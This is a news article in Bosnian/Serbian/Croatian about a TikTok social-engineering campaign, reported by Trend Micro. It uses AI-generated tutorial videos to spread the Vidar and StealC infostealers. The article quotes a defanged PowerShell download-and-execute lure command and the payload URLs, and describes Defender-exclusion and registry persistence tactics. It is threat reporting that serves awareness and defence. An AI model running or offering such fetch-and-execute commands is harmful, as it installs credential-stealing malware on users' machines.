Kriminalci su otkrili novu oblast za distribuciju malvera, koristeći ogromnu bazu korisnika i algoritamski doseg TikToka.
Pojavila se sofisticirana kampanja socijalnog inženjeringa koja koristi AI generisane video snimke kako bi prevarila korisnike da preuzmu opasan malver za krađu informacija, prerušen u tutorijale za aktivaciju softvera.
Ovi obmanjujući video snimci obećavaju pomoć korisnicima oko aktivacije legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju ozloglašene kradljivce informacija Vidar i StealC nesuđenim žrtvama.
Ova kampanja predstavlja značajan napredak u metodama distribucije malvera, udaljavajući se od tradicionalnih metoda isporuke putem veba i iskorištavajući povjerenje i angažman svojstvene platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na kompromitovane veb stranice ili fišing imejlove, ova operacija ugrađuje sve elemente socijalnog inženjeringa direktno u video sadržaj, čineći detekciju znatno težom za sigurnosna rješenja.
Napadači koriste prednost viralnosti TikToka, pri čemu je jedan kompromitujući video snimak zabilježio skoro 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što ukazuje na alarmantan doseg i efikasnost kampanje.
Analitičari Trend Micro-a identifikovali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, koji su od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali upadljivo slične video snimke bez lica i sa AI generisanim glasovima, što sugerira automatizovani proces proizvodnje namijenjen skaliranju.
Tehnička sofisticiranost napada postaje jasna kroz njegovu metodologiju izvršenja.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasnu komandu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript pokreće višestepeni proces infekcije koji demonstrira napredne tehnike izbjegavanja detekcije.
Mehanizam infekcije i taktike upornosti
Lanac infekcije malvera otkriva pažljivo orkestrirane korake osmišljene da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.
Nakon izvršenja, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera, odmah dodajući te lokacije na listu izuzetaka Windows Defendera kako bi se spriječilo skeniranje antivirusnog softvera.
Skript zatim preuzima primarni teret sa `hxxps://amssh[.]co/file.exe`, koji sadrži varijante malvera Vidar ili StealC.
Mehanizam upornosti uključuje preuzimanje dodatnog PowerShell skripta sa `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava da se malver izvršava pri pokretanju sistema.
Posebno, Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge kao što su Steam profili i Telegram kanali kao “Dead Drop Resolvers” kako bi prikrio stvarne adrese C&C servera, čineći napore detekcije i uklanjanja znatno složenijim.
